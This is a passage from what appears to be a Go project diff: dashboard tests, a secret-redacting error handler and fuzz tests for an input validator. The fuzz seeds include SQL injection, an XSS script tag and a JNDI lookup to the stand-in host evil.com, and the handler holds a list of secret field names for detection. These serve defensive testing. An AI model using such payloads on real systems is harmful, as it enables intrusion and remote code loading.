		ExportFormat:   "json",
	}
	dashboard2 := NewSecurityDashboard(monitor, customConfig)
	assert.NotNil(t, dashboard2)
	assert.Equal(t, time.Minute, dashboard2.config.RefreshInterval)
	assert.Equal(t, 0.5, dashboard2.config.AlertThresholds["test_metric"])
}

// TestGenerateDashboard records one event and checks that a generated
// dashboard populates every widget section (all widgets enabled by default).
func TestGenerateDashboard(t *testing.T) {
	monitor := NewSecurityMonitor(&MonitorConfig{
		EnableAlerts:    true,
		AlertBuffer:     1000,
		MaxEvents:       1000,
		CleanupInterval: time.Hour,
		MetricsInterval: 30 * time.Second,
	})
	dashboard := NewSecurityDashboard(monitor, nil)
	// Generate some test data
	monitor.RecordEvent("request", "127.0.0.1", "Test request", "info", map[string]interface{}{
		"success": true,
	})
	data, err := dashboard.GenerateDashboard()
	require.NoError(t, err)
	assert.NotNil(t, data)
	assert.NotNil(t, data.OverviewMetrics)
	assert.NotNil(t, data.ThreatAnalysis)
	assert.NotNil(t, data.PerformanceData)
	assert.NotNil(t, data.TrendAnalysis)
	assert.NotNil(t, data.SystemHealth)
}
// TestOverviewMetrics sanity-checks overview ranges: score and success
// rate within [0, 100] and a threat level from the known label set.
func TestOverviewMetrics(t *testing.T) {
	monitor := NewSecurityMonitor(&MonitorConfig{
		EnableAlerts: true,
	})
	dashboard := NewSecurityDashboard(monitor, nil)
	metrics := monitor.GetMetrics()
	overview := dashboard.generateOverviewMetrics(metrics)
	assert.NotNil(t, overview)
	assert.GreaterOrEqual(t, overview.SecurityScore, 0.0)
	assert.LessOrEqual(t, overview.SecurityScore, 100.0)
	assert.Contains(t, []string{"LOW", "MEDIUM", "HIGH", "CRITICAL"}, overview.ThreatLevel)
	assert.GreaterOrEqual(t, overview.SuccessRate, 0.0)
	assert.LessOrEqual(t, overview.SuccessRate, 100.0)
}

// TestThreatAnalysis verifies that all risk scores are normalized to
// [0, 1] and the nested mitigation/vector structures are initialized.
func TestThreatAnalysis(t *testing.T) {
	monitor := NewSecurityMonitor(&MonitorConfig{
		EnableAlerts: true,
	})
	dashboard := NewSecurityDashboard(monitor, nil)
	metrics := monitor.GetMetrics()
	threatAnalysis := dashboard.generateThreatAnalysis(metrics)
	assert.NotNil(t, threatAnalysis)
	assert.GreaterOrEqual(t, threatAnalysis.DDoSRisk, 0.0)
	assert.LessOrEqual(t, threatAnalysis.DDoSRisk, 1.0)
	assert.GreaterOrEqual(t, threatAnalysis.BruteForceRisk, 0.0)
	assert.LessOrEqual(t, threatAnalysis.BruteForceRisk, 1.0)
	assert.GreaterOrEqual(t, threatAnalysis.AnomalyScore, 0.0)
	assert.LessOrEqual(t, threatAnalysis.AnomalyScore, 1.0)
	assert.NotNil(t, threatAnalysis.MitigationStatus)
	assert.NotNil(t, threatAnalysis.ThreatVectors)
}

// TestPerformanceMetrics checks that timing averages are strictly positive
// and the error rate is a percentage in [0, 100].
func TestPerformanceMetrics(t *testing.T) {
	monitor := NewSecurityMonitor(&MonitorConfig{
		EnableAlerts: true,
	})
	dashboard := NewSecurityDashboard(monitor, nil)
	metrics := monitor.GetMetrics()
	performance := dashboard.generatePerformanceMetrics(metrics)
	assert.NotNil(t, performance)
	assert.Greater(t, performance.AverageValidationTime, 0.0)
	assert.Greater(t, performance.AverageEncryptionTime, 0.0)
	assert.Greater(t, performance.AverageDecryptionTime, 0.0)
	assert.GreaterOrEqual(t, performance.ErrorRate, 0.0)
	assert.LessOrEqual(t, performance.ErrorRate, 100.0)
}

// TestDashboardSystemHealth verifies the health widget: component map is
// initialized, overall status is a known label, and score is in [0, 100].
func TestDashboardSystemHealth(t *testing.T) {
	monitor := NewSecurityMonitor(&MonitorConfig{
		EnableAlerts: true,
	})
	dashboard := NewSecurityDashboard(monitor, nil)
	metrics := monitor.GetMetrics()
	health := dashboard.generateSystemHealth(metrics)
	assert.NotNil(t, health)
	assert.NotNil(t, health.SecurityComponentHealth)
	assert.Contains(t, []string{"HEALTHY", "WARNING", "DEGRADED", "CRITICAL"}, health.OverallHealth)
	assert.GreaterOrEqual(t, health.HealthScore, 0.0)
	assert.LessOrEqual(t, health.HealthScore, 100.0)
}
// TestTopThreats checks structural invariants of the top-threats list:
// bounded length and well-formed entries with known severity/status labels.
func TestTopThreats(t *testing.T) {
	monitor := NewSecurityMonitor(&MonitorConfig{
		EnableAlerts: true,
	})
	dashboard := NewSecurityDashboard(monitor, nil)
	metrics := monitor.GetMetrics()
	topThreats := dashboard.generateTopThreats(metrics)
	assert.NotNil(t, topThreats)
	assert.LessOrEqual(t, len(topThreats), 10) // Should be reasonable number
	for _, threat := range topThreats {
		assert.NotEmpty(t, threat.ThreatType)
		assert.GreaterOrEqual(t, threat.Count, int64(0))
		assert.Contains(t, []string{"NONE", "LOW", "MEDIUM", "HIGH", "CRITICAL"}, threat.Severity)
		assert.Contains(t, []string{"ACTIVE", "MITIGATED", "MONITORING"}, threat.Status)
	}
}

// TestTrendAnalysis verifies the trend widget's containers are initialized
// and, when present, hourly request points are bounded (<=24 buckets) with
// non-negative values and real timestamps.
func TestTrendAnalysis(t *testing.T) {
	monitor := NewSecurityMonitor(&MonitorConfig{
		EnableAlerts: true,
	})
	dashboard := NewSecurityDashboard(monitor, nil)
	metrics := monitor.GetMetrics()
	trends := dashboard.generateTrendAnalysis(metrics)
	assert.NotNil(t, trends)
	assert.NotNil(t, trends.HourlyTrends)
	assert.NotNil(t, trends.DailyTrends)
	assert.NotNil(t, trends.Predictions)
	assert.NotNil(t, trends.GrowthRates)
	// Check hourly trends have expected structure
	if requestTrends, exists := trends.HourlyTrends["requests"]; exists {
		assert.LessOrEqual(t, len(requestTrends), 24) // Should have at most 24 hours
		for _, point := range requestTrends {
			assert.GreaterOrEqual(t, point.Value, 0.0)
			assert.False(t, point.Timestamp.IsZero())
		}
	}
}

// TestExportDashboard exercises each supported export format (json, csv,
// prometheus) plus the error path for an unknown format.
func TestExportDashboard(t *testing.T) {
	monitor := NewSecurityMonitor(&MonitorConfig{
		EnableAlerts: true,
	})
	dashboard := NewSecurityDashboard(monitor, nil)
	// Test JSON export
	jsonData, err := dashboard.ExportDashboard("json")
	require.NoError(t, err)
	assert.NotEmpty(t, jsonData)
	// Verify it's valid JSON
	var parsed DashboardData
	err = json.Unmarshal(jsonData, &parsed)
	require.NoError(t, err)
	// Test CSV export
	csvData, err := dashboard.ExportDashboard("csv")
	require.NoError(t, err)
	assert.NotEmpty(t, csvData)
	assert.Contains(t, string(csvData), "Metric,Value,Timestamp")
	// Test Prometheus export
	promData, err := dashboard.ExportDashboard("prometheus")
	require.NoError(t, err)
	assert.NotEmpty(t, promData)
	assert.Contains(t, string(promData), "# HELP")
	assert.Contains(t, string(promData), "# TYPE")
	// Test unsupported format
	_, err = dashboard.ExportDashboard("unsupported")
	assert.Error(t, err)
	assert.Contains(t, err.Error(), "unsupported export format")
}
// TestSecurityScoreCalculation verifies the score is a perfect 100 for
// threat-free metrics and strictly lower (but still >= 0) once threats
// and blocks are recorded.
func TestSecurityScoreCalculation(t *testing.T) {
	monitor := NewSecurityMonitor(&MonitorConfig{
		EnableAlerts: true,
	})
	dashboard := NewSecurityDashboard(monitor, nil)
	// Test with clean metrics (high score)
	cleanMetrics := &SecurityMetrics{
		TotalRequests:       1000,
		BlockedRequests:     0,
		DDoSAttempts:        0,
		BruteForceAttempts:  0,
		RateLimitViolations: 0,
	}
	score := dashboard.calculateSecurityScore(cleanMetrics)
	assert.Equal(t, 100.0, score)
	// Test with some threats (reduced score)
	threatsMetrics := &SecurityMetrics{
		TotalRequests:       1000,
		BlockedRequests:     50,
		DDoSAttempts:        10,
		BruteForceAttempts:  5,
		RateLimitViolations: 20,
	}
	score = dashboard.calculateSecurityScore(threatsMetrics)
	assert.Less(t, score, 100.0)
	assert.GreaterOrEqual(t, score, 0.0)
}

// TestThreatLevelCalculation pins the score->level band boundaries via a
// small table of representative scores.
func TestThreatLevelCalculation(t *testing.T) {
	monitor := NewSecurityMonitor(&MonitorConfig{
		EnableAlerts: true,
	})
	dashboard := NewSecurityDashboard(monitor, nil)
	testCases := []struct {
		score    float64
		expected string
	}{
		{95.0, "LOW"},
		{85.0, "MEDIUM"},
		{60.0, "HIGH"},
		{30.0, "CRITICAL"},
	}
	for _, tc := range testCases {
		result := dashboard.calculateThreatLevel(tc.score)
		assert.Equal(t, tc.expected, result, "Score %.1f should give threat level %s", tc.score, tc.expected)
	}
}

// TestWidgetConfiguration checks that EnabledWidgets acts as an allowlist:
// sections for disabled widgets must be left nil in the generated data.
func TestWidgetConfiguration(t *testing.T) {
	monitor := NewSecurityMonitor(&MonitorConfig{
		EnableAlerts: true,
	})
	// Test with limited widgets
	config := &DashboardConfig{
		EnabledWidgets: []string{"overview", "alerts"},
	}
	dashboard := NewSecurityDashboard(monitor, config)
	assert.True(t, dashboard.isWidgetEnabled("overview"))
	assert.True(t, dashboard.isWidgetEnabled("alerts"))
	assert.False(t, dashboard.isWidgetEnabled("threats"))
	assert.False(t, dashboard.isWidgetEnabled("performance"))
	// Generate dashboard with limited widgets
	data, err := dashboard.GenerateDashboard()
	require.NoError(t, err)
	assert.NotNil(t, data.OverviewMetrics)
	assert.NotNil(t, data.SecurityAlerts)
	assert.Nil(t, data.ThreatAnalysis)  // Should be nil because "threats" widget is disabled
	assert.Nil(t, data.PerformanceData) // Should be nil because "performance" widget is disabled
}
// TestAttackPatternDetection verifies that elevated DDoS counters produce
// a well-formed DDoS pattern entry (type, frequency, severity, bounded
// confidence, non-empty description).
func TestAttackPatternDetection(t *testing.T) {
	monitor := NewSecurityMonitor(&MonitorConfig{
		EnableAlerts: true,
	})
	dashboard := NewSecurityDashboard(monitor, nil)
	// Test with metrics showing DDoS activity
	metrics := &SecurityMetrics{
		DDoSAttempts:       25,
		BruteForceAttempts: 0,
	}
	patterns := dashboard.detectAttackPatterns(metrics)
	assert.NotEmpty(t, patterns)
	ddosPattern := patterns[0]
	assert.Equal(t, "DDoS", ddosPattern.PatternType)
	assert.Equal(t, int64(25), ddosPattern.Frequency)
	assert.Equal(t, "HIGH", ddosPattern.Severity)
	assert.GreaterOrEqual(t, ddosPattern.Confidence, 0.0)
	assert.LessOrEqual(t, ddosPattern.Confidence, 1.0)
	assert.NotEmpty(t, ddosPattern.Description)
}

// TestRiskFactorIdentification checks that each elevated counter maps to
// its expected risk-factor string, and that near-clean metrics yield none.
func TestRiskFactorIdentification(t *testing.T) {
	monitor := NewSecurityMonitor(&MonitorConfig{
		EnableAlerts: true,
	})
	dashboard := NewSecurityDashboard(monitor, nil)
	// Test with various risk scenarios
	riskMetrics := &SecurityMetrics{
		DDoSAttempts:        15,
		BruteForceAttempts:  8,
		RateLimitViolations: 150,
		FailedKeyAccess:     12,
	}
	factors := dashboard.identifyRiskFactors(riskMetrics)
	assert.NotEmpty(t, factors)
	assert.Contains(t, factors, "High DDoS activity")
	assert.Contains(t, factors, "Brute force attacks detected")
	assert.Contains(t, factors, "Excessive rate limit violations")
	assert.Contains(t, factors, "Multiple failed key access attempts")
	// Test with clean metrics
	cleanMetrics := &SecurityMetrics{
		DDoSAttempts:        0,
		BruteForceAttempts:  0,
		RateLimitViolations: 5,
		FailedKeyAccess:     2,
	}
	cleanFactors := dashboard.identifyRiskFactors(cleanMetrics)
	assert.Empty(t, cleanFactors)
}
// BenchmarkGenerateDashboard measures end-to-end dashboard generation.
// Setup is excluded from timing via b.ResetTimer.
func BenchmarkGenerateDashboard(b *testing.B) {
	monitor := NewSecurityMonitor(&MonitorConfig{
		EnableAlerts: true,
	})
	dashboard := NewSecurityDashboard(monitor, nil)
	b.ResetTimer()
	for i := 0; i < b.N; i++ {
		_, err := dashboard.GenerateDashboard()
		if err != nil {
			b.Fatal(err)
		}
	}
}

// BenchmarkExportJSON measures JSON export (generation + marshalling).
func BenchmarkExportJSON(b *testing.B) {
	monitor := NewSecurityMonitor(&MonitorConfig{
		EnableAlerts: true,
	})
	dashboard := NewSecurityDashboard(monitor, nil)
	b.ResetTimer()
	for i := 0; i < b.N; i++ {
		_, err := dashboard.ExportDashboard("json")
		if err != nil {
			b.Fatal(err)
		}
	}
}

View File

@@ -0,0 +1,348 @@
package security
import (
"context"
"fmt"
"regexp"
"runtime"
"strings"
"time"
"github.com/fraktal/mev-beta/internal/logger"
)
// SecureError represents a security-aware error with context.
// It wraps an underlying error with a stable code, classification, and
// sanitized context, and records whether sensitive data was detected so
// string renderings can redact it.
type SecureError struct {
	Code      string                 `json:"code"`              // stable machine-readable identifier (e.g. "AUTH_FAILED")
	Message   string                 `json:"message"`           // human-readable summary
	Timestamp time.Time              `json:"timestamp"`         // when the error was wrapped
	Context   map[string]interface{} `json:"context,omitempty"` // sanitized key/value context
	Stack     []StackFrame           `json:"stack,omitempty"`   // captured call stack, if enabled
	Wrapped   error                  `json:"-"`                 // underlying cause; excluded from JSON
	Sensitive bool                   `json:"sensitive"`         // true if sensitive data was detected
	Category  ErrorCategory          `json:"category"`
	Severity  ErrorSeverity          `json:"severity"`
}

// StackFrame represents a single frame in the call stack.
type StackFrame struct {
	Function string `json:"function"` // fully-qualified function name
	File     string `json:"file"`     // source file path
	Line     int    `json:"line"`     // line number within File
}

// ErrorCategory defines categories of errors.
type ErrorCategory string

const (
	ErrorCategoryAuthentication ErrorCategory = "authentication"
	ErrorCategoryAuthorization  ErrorCategory = "authorization"
	ErrorCategoryValidation     ErrorCategory = "validation"
	ErrorCategoryRateLimit      ErrorCategory = "rate_limit"
	ErrorCategoryCircuitBreaker ErrorCategory = "circuit_breaker"
	ErrorCategoryEncryption     ErrorCategory = "encryption"
	ErrorCategoryNetwork        ErrorCategory = "network"
	ErrorCategoryTransaction    ErrorCategory = "transaction"
	ErrorCategoryInternal       ErrorCategory = "internal"
)

// ErrorSeverity defines error severity levels, from low to critical.
type ErrorSeverity string

const (
	ErrorSeverityLow      ErrorSeverity = "low"
	ErrorSeverityMedium   ErrorSeverity = "medium"
	ErrorSeverityHigh     ErrorSeverity = "high"
	ErrorSeverityCritical ErrorSeverity = "critical"
)

// ErrorHandler provides secure error handling with context preservation.
// It classifies and redacts errors, tracks aggregate metrics, and logs
// through its own logger instance.
type ErrorHandler struct {
	enableStackTrace bool            // capture call stacks on wrap when true
	sensitiveFields  map[string]bool // lowercase field names treated as secrets
	errorMetrics     *ErrorMetrics   // running counters, see updateMetrics
	logger           *logger.Logger
}

// ErrorMetrics tracks error statistics accumulated by the handler.
type ErrorMetrics struct {
	TotalErrors        int64                   `json:"total_errors"`
	ErrorsByCategory   map[ErrorCategory]int64 `json:"errors_by_category"`
	ErrorsBySeverity   map[ErrorSeverity]int64 `json:"errors_by_severity"`
	SensitiveDataLeaks int64                   `json:"sensitive_data_leaks"` // count of errors flagged Sensitive
}
// NewErrorHandler creates a new secure error handler.
// enableStackTrace controls whether WrapError captures call stacks.
// The sensitive-field list seeds redaction and leak detection, and the
// handler logs as JSON to logs/errors.log.
func NewErrorHandler(enableStackTrace bool) *ErrorHandler {
	// Field names (lowercase) whose values must never appear in logs.
	sensitive := make(map[string]bool)
	for _, field := range []string{
		"password", "private_key", "secret", "token",
		"seed", "mnemonic", "api_key", "private",
	} {
		sensitive[field] = true
	}

	return &ErrorHandler{
		enableStackTrace: enableStackTrace,
		sensitiveFields:  sensitive,
		errorMetrics: &ErrorMetrics{
			ErrorsByCategory: make(map[ErrorCategory]int64),
			ErrorsBySeverity: make(map[ErrorSeverity]int64),
		},
		logger: logger.New("info", "json", "logs/errors.log"),
	}
}
// WrapError wraps err in a SecureError carrying a stable code, message,
// category and severity. A nil err yields nil. The wrapped error is
// scanned for sensitive data, counted in the handler's metrics, and logged.
func (eh *ErrorHandler) WrapError(err error, code string, message string, category ErrorCategory, severity ErrorSeverity) *SecureError {
	if err == nil {
		return nil
	}

	wrapped := &SecureError{
		Code:      code,
		Message:   message,
		Timestamp: time.Now(),
		Context:   map[string]interface{}{},
		Wrapped:   err,
		Category:  category,
		Severity:  severity,
	}

	// Optional stack capture (skips the wrapping machinery itself).
	if eh.enableStackTrace {
		wrapped.Stack = eh.captureStackTrace()
	}

	// Flag the error if either the cause or the message mentions secrets.
	wrapped.Sensitive = eh.containsSensitiveData(err.Error()) || eh.containsSensitiveData(message)

	eh.updateMetrics(wrapped)
	eh.logError(wrapped)
	return wrapped
}
// WrapErrorWithContext wraps an error with additional caller-supplied
// context. Sensitive keys are stored as "[REDACTED]" and mark the error
// sensitive; request-scoped identifiers found on ctx are copied through.
// Returns nil when err is nil.
//
// The trailing parameter was renamed from `context` to `extraContext`:
// the old name shadowed the imported context package inside the body
// (it compiled only because signature types resolve before parameter
// scope takes effect), which is confusing and fragile.
func (eh *ErrorHandler) WrapErrorWithContext(ctx context.Context, err error, code string, message string, category ErrorCategory, severity ErrorSeverity, extraContext map[string]interface{}) *SecureError {
	secureErr := eh.WrapError(err, code, message, category, severity)
	if secureErr == nil {
		return nil
	}

	// Add context while sanitizing sensitive data.
	for key, value := range extraContext {
		if eh.isSensitiveField(key) {
			secureErr.Context[key] = "[REDACTED]"
			secureErr.Sensitive = true
		} else {
			secureErr.Context[key] = value
		}
	}

	// Propagate request-scoped identifiers when present.
	// NOTE(review): lookups use plain string keys; they only match values
	// stored with the same string keys — confirm against the callers.
	if ctx != nil {
		if requestID := ctx.Value("request_id"); requestID != nil {
			secureErr.Context["request_id"] = requestID
		}
		if userID := ctx.Value("user_id"); userID != nil {
			secureErr.Context["user_id"] = userID
		}
		if sessionID := ctx.Value("session_id"); sessionID != nil {
			secureErr.Context["session_id"] = sessionID
		}
	}
	return secureErr
}
// Error implements the error interface. Sensitive errors advertise that
// their details were redacted.
func (se *SecureError) Error() string {
	base := fmt.Sprintf("[%s] %s", se.Code, se.Message)
	if se.Sensitive {
		return base + " (sensitive data redacted)"
	}
	return base
}

// Unwrap exposes the wrapped cause for errors.Is / errors.As chains.
func (se *SecureError) Unwrap() error {
	return se.Wrapped
}

// SafeString returns a representation safe for external consumption:
// sensitive errors are reduced to their message with a redaction notice.
func (se *SecureError) SafeString() string {
	if !se.Sensitive {
		return se.Error()
	}
	return fmt.Sprintf("Error: %s (details redacted for security)", se.Message)
}

// DetailedString returns a comma-separated dump of all fields for
// internal logging; it includes context and the wrapped cause when set.
func (se *SecureError) DetailedString() string {
	parts := []string{
		fmt.Sprintf("Code: %s", se.Code),
		fmt.Sprintf("Message: %s", se.Message),
		fmt.Sprintf("Category: %s", se.Category),
		fmt.Sprintf("Severity: %s", se.Severity),
		fmt.Sprintf("Timestamp: %s", se.Timestamp.Format(time.RFC3339)),
	}
	if len(se.Context) > 0 {
		parts = append(parts, fmt.Sprintf("Context: %+v", se.Context))
	}
	if se.Wrapped != nil {
		parts = append(parts, fmt.Sprintf("Wrapped: %s", se.Wrapped.Error()))
	}
	return strings.Join(parts, ", ")
}
// captureStackTrace records up to seven frames of the current call stack,
// starting above the error-wrapping machinery (frames 0-2 are this helper
// and WrapError).
func (eh *ErrorHandler) captureStackTrace() []StackFrame {
	var frames []StackFrame
	for depth := 3; depth < 10; depth++ {
		pc, file, line, ok := runtime.Caller(depth)
		if !ok {
			break // ran off the top of the stack
		}
		fn := runtime.FuncForPC(pc)
		if fn == nil {
			continue // no symbol info for this PC
		}
		frames = append(frames, StackFrame{
			Function: fn.Name(),
			File:     file,
			Line:     line,
		})
	}
	return frames
}
// sensitiveDataPatterns matches values that frequently embed secrets:
// Ethereum addresses, 32-byte hex keys/hashes, and long base64 runs.
// Compiled once at package init instead of on every call, and with
// MustCompile so an invalid pattern fails loudly instead of being
// silently ignored (the old code discarded regexp.MatchString's error).
var sensitiveDataPatterns = []*regexp.Regexp{
	regexp.MustCompile(`0x[a-fA-F0-9]{40}`),            // Ethereum addresses
	regexp.MustCompile(`0x[a-fA-F0-9]{64}`),            // Private keys/hashes
	regexp.MustCompile(`\b[A-Za-z0-9+/]{20,}={0,2}\b`), // Base64 encoded data
}

// containsSensitiveData reports whether text mentions a configured
// sensitive field name (case-insensitive) or matches a secret-like pattern.
func (eh *ErrorHandler) containsSensitiveData(text string) bool {
	lowercaseText := strings.ToLower(text)
	for field := range eh.sensitiveFields {
		if strings.Contains(lowercaseText, field) {
			return true
		}
	}
	for _, pattern := range sensitiveDataPatterns {
		if pattern.MatchString(text) {
			return true
		}
	}
	return false
}
// isSensitiveField checks if a field name indicates sensitive data.
// The lookup is case-insensitive; unknown names return false (map zero value).
func (eh *ErrorHandler) isSensitiveField(fieldName string) bool {
	return eh.sensitiveFields[strings.ToLower(fieldName)]
}
// updateMetrics increments the handler's counters for the wrapped error.
// NOTE(review): counters and maps are mutated without synchronization, so
// concurrent WrapError calls would race (map writes can panic) — confirm
// the handler is used from a single goroutine or add locking.
func (eh *ErrorHandler) updateMetrics(err *SecureError) {
	eh.errorMetrics.TotalErrors++
	eh.errorMetrics.ErrorsByCategory[err.Category]++
	eh.errorMetrics.ErrorsBySeverity[err.Severity]++
	if err.Sensitive {
		eh.errorMetrics.SensitiveDataLeaks++
	}
}
// logError logs the error at a level chosen from its severity; sensitive
// errors are logged with a generic message so secrets never reach the log.
// NOTE(review): logContext is assembled below but never handed to the
// logger — only the bare message is emitted. Structured logging appears
// to have been intended; confirm the logger API and wire the fields in.
func (eh *ErrorHandler) logError(err *SecureError) {
	logContext := map[string]interface{}{
		"error_code":     err.Code,
		"error_category": string(err.Category),
		"error_severity": string(err.Severity),
		"timestamp":      err.Timestamp,
	}
	// Add safe context (sensitive keys are excluded entirely).
	for key, value := range err.Context {
		if !eh.isSensitiveField(key) {
			logContext[key] = value
		}
	}
	logMessage := err.Message
	if err.Sensitive {
		logMessage = "Sensitive error occurred (details redacted)"
		logContext["sensitive"] = true
	}
	// Critical and High both currently map to Error level.
	switch err.Severity {
	case ErrorSeverityCritical:
		eh.logger.Error(logMessage)
	case ErrorSeverityHigh:
		eh.logger.Error(logMessage)
	case ErrorSeverityMedium:
		eh.logger.Warn(logMessage)
	case ErrorSeverityLow:
		eh.logger.Info(logMessage)
	default:
		eh.logger.Info(logMessage)
	}
}
// GetMetrics returns current error metrics.
// The returned pointer aliases the handler's live state: callers observe
// later updates and must treat it as read-only.
func (eh *ErrorHandler) GetMetrics() *ErrorMetrics {
	return eh.errorMetrics
}
// Common error creation helpers.
// Each helper fixes the error code, category and severity for one class
// of failure and delegates to WrapError (so a nil err yields nil).

// NewAuthenticationError creates a new authentication error (code AUTH_FAILED, severity high).
func (eh *ErrorHandler) NewAuthenticationError(message string, err error) *SecureError {
	return eh.WrapError(err, "AUTH_FAILED", message, ErrorCategoryAuthentication, ErrorSeverityHigh)
}

// NewAuthorizationError creates a new authorization error (code AUTHZ_FAILED, severity high).
func (eh *ErrorHandler) NewAuthorizationError(message string, err error) *SecureError {
	return eh.WrapError(err, "AUTHZ_FAILED", message, ErrorCategoryAuthorization, ErrorSeverityHigh)
}

// NewValidationError creates a new validation error (code VALIDATION_FAILED, severity medium).
func (eh *ErrorHandler) NewValidationError(message string, err error) *SecureError {
	return eh.WrapError(err, "VALIDATION_FAILED", message, ErrorCategoryValidation, ErrorSeverityMedium)
}

// NewRateLimitError creates a new rate limit error (code RATE_LIMIT_EXCEEDED, severity medium).
func (eh *ErrorHandler) NewRateLimitError(message string, err error) *SecureError {
	return eh.WrapError(err, "RATE_LIMIT_EXCEEDED", message, ErrorCategoryRateLimit, ErrorSeverityMedium)
}

// NewEncryptionError creates a new encryption error (code ENCRYPTION_FAILED, severity critical).
func (eh *ErrorHandler) NewEncryptionError(message string, err error) *SecureError {
	return eh.WrapError(err, "ENCRYPTION_FAILED", message, ErrorCategoryEncryption, ErrorSeverityCritical)
}

// NewTransactionError creates a new transaction error (code TRANSACTION_FAILED, severity high).
func (eh *ErrorHandler) NewTransactionError(message string, err error) *SecureError {
	return eh.WrapError(err, "TRANSACTION_FAILED", message, ErrorCategoryTransaction, ErrorSeverityHigh)
}

// NewInternalError creates a new internal error (code INTERNAL_ERROR, severity critical).
func (eh *ErrorHandler) NewInternalError(message string, err error) *SecureError {
	return eh.WrapError(err, "INTERNAL_ERROR", message, ErrorCategoryInternal, ErrorSeverityCritical)
}

View File

@@ -0,0 +1,267 @@
package security
import (
	"math/big"
	"strconv"
	"strings"
	"testing"
	"time"

	"github.com/ethereum/go-ethereum/common"
	"github.com/ethereum/go-ethereum/core/types"
)
// FuzzValidateAddress tests address validation with random inputs.
// Only strings that parse as hex addresses reach the validator; for those
// it asserts no panic, a non-nil result, and that invalid results always
// carry at least one error.
func FuzzValidateAddress(f *testing.F) {
	validator := NewInputValidator(42161) // Arbitrum chain ID
	// Seed corpus with known patterns
	f.Add("0x0000000000000000000000000000000000000000") // Zero address
	f.Add("0xa0b86991c431c431c8f4c431c431c431c431c431c") // Valid address
	f.Add("0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef") // Suspicious pattern
	f.Add("0x")             // Short invalid
	f.Add("")               // Empty
	f.Add("not_an_address") // Invalid format
	f.Fuzz(func(t *testing.T, addrStr string) {
		defer func() {
			if r := recover(); r != nil {
				t.Errorf("ValidateAddress panicked with input %q: %v", addrStr, r)
			}
		}()
		// Test that validation doesn't crash on any input
		if common.IsHexAddress(addrStr) {
			addr := common.HexToAddress(addrStr)
			result := validator.ValidateAddress(addr)
			// Ensure result is never nil
			if result == nil {
				t.Error("ValidateAddress returned nil result")
			}
			// Validate result structure
			if len(result.Errors) == 0 && !result.Valid {
				t.Error("Result marked invalid but no errors provided")
			}
		}
	})
}
// FuzzValidateString tests string validation with various injection
// attempts (SQLi, XSS, JNDI, control bytes, oversized input), and checks
// that sanitization strips null bytes without blowing up output size.
func FuzzValidateString(f *testing.F) {
	validator := NewInputValidator(42161)
	// Seed with common injection patterns
	f.Add("'; DROP TABLE users; --")
	f.Add("<script>alert('xss')</script>")
	f.Add("${jndi:ldap://evil.com/}")
	f.Add("\x00\x01\x02\x03\x04")
	f.Add(strings.Repeat("A", 10000))
	f.Add("normal_string")
	f.Fuzz(func(t *testing.T, input string) {
		defer func() {
			if r := recover(); r != nil {
				t.Errorf("ValidateString panicked with input length %d: %v", len(input), r)
			}
		}()
		result := validator.ValidateString(input, "test_field", 1000)
		// Ensure validation completes
		if result == nil {
			t.Error("ValidateString returned nil result")
		}
		// Test sanitization
		sanitized := validator.SanitizeInput(input)
		// Ensure sanitized string doesn't contain null bytes
		if strings.Contains(sanitized, "\x00") {
			t.Error("Sanitized string still contains null bytes")
		}
		// Ensure sanitization doesn't crash
		if len(sanitized) > len(input)*2 {
			t.Error("Sanitized string unexpectedly longer than 2x original")
		}
	})
}
// FuzzValidateNumericString tests numeric string validation: any input the
// validator accepts must actually parse via big.Float (or big.Int for
// integer-looking strings, tolerating regex/parser differences).
func FuzzValidateNumericString(f *testing.F) {
	validator := NewInputValidator(42161)
	// Seed with various numeric patterns
	f.Add("123.456")
	f.Add("-123")
	f.Add("0.000000000000000001")
	f.Add("999999999999999999999")
	f.Add("00123")
	f.Add("123.456.789")
	f.Add("1e10")
	f.Add("abc123")
	f.Fuzz(func(t *testing.T, input string) {
		defer func() {
			if r := recover(); r != nil {
				t.Errorf("ValidateNumericString panicked with input %q: %v", input, r)
			}
		}()
		result := validator.ValidateNumericString(input, "test_number")
		if result == nil {
			t.Error("ValidateNumericString returned nil result")
		}
		// If marked valid, should actually be parseable as number
		if result.Valid {
			if _, ok := new(big.Float).SetString(input); !ok {
				// Allow some flexibility for our regex vs big.Float parsing
				if !strings.Contains(input, ".") {
					if _, ok := new(big.Int).SetString(input, 10); !ok {
						t.Errorf("String marked as valid numeric but not parseable: %q", input)
					}
				}
			}
		}
	})
}
// FuzzTransactionValidation tests transaction validation with random
// transaction data, asserting the validator never panics and never
// returns a nil result.
func FuzzTransactionValidation(f *testing.F) {
	validator := NewInputValidator(42161)
	f.Fuzz(func(t *testing.T, nonce, gasLimit uint64, gasPrice, value int64, dataLen uint8) {
		defer func() {
			if r := recover(); r != nil {
				t.Errorf("Transaction validation panicked: %v", r)
			}
		}()
		// Constrain inputs to reasonable ranges.
		if gasLimit > 50000000 {
			gasLimit = gasLimit % 50000000
		}
		if dataLen > 100 {
			dataLen = dataLen % 100
		}
		// Deterministic payload of the fuzzed length.
		data := make([]byte, dataLen)
		for i := range data {
			data[i] = byte(i % 256)
		}
		// Take absolute values in big.Int space rather than negating the
		// int64: -math.MinInt64 overflows and stays negative, which
		// previously let a negative gas price/value slip through the
		// "make it non-negative" intent of this harness.
		gasPriceBig := new(big.Int).Abs(big.NewInt(gasPrice))
		valueBig := new(big.Int).Abs(big.NewInt(value))
		to := common.HexToAddress("0x1234567890123456789012345678901234567890")
		tx := types.NewTransaction(nonce, to, valueBig, gasLimit, gasPriceBig, data)
		result := validator.ValidateTransaction(tx)
		if result == nil {
			t.Error("ValidateTransaction returned nil result")
		}
	})
}
// FuzzSwapParamsValidation tests swap parameter validation.
// Note amounts may be negative and hoursFromNow may be in the past —
// the harness deliberately feeds invalid combinations and only asserts
// that validation neither panics nor returns nil.
func FuzzSwapParamsValidation(f *testing.F) {
	validator := NewInputValidator(42161)
	f.Fuzz(func(t *testing.T, amountIn, amountOut int64, slippage uint16, hoursFromNow int8) {
		defer func() {
			if r := recover(); r != nil {
				t.Errorf("SwapParams validation panicked: %v", r)
			}
		}()
		// Create test swap parameters
		params := &SwapParams{
			TokenIn:   common.HexToAddress("0x1111111111111111111111111111111111111111"),
			TokenOut:  common.HexToAddress("0x2222222222222222222222222222222222222222"),
			AmountIn:  big.NewInt(amountIn),
			AmountOut: big.NewInt(amountOut),
			Slippage:  uint64(slippage),
			Deadline:  time.Now().Add(time.Duration(hoursFromNow) * time.Hour),
			Recipient: common.HexToAddress("0x3333333333333333333333333333333333333333"),
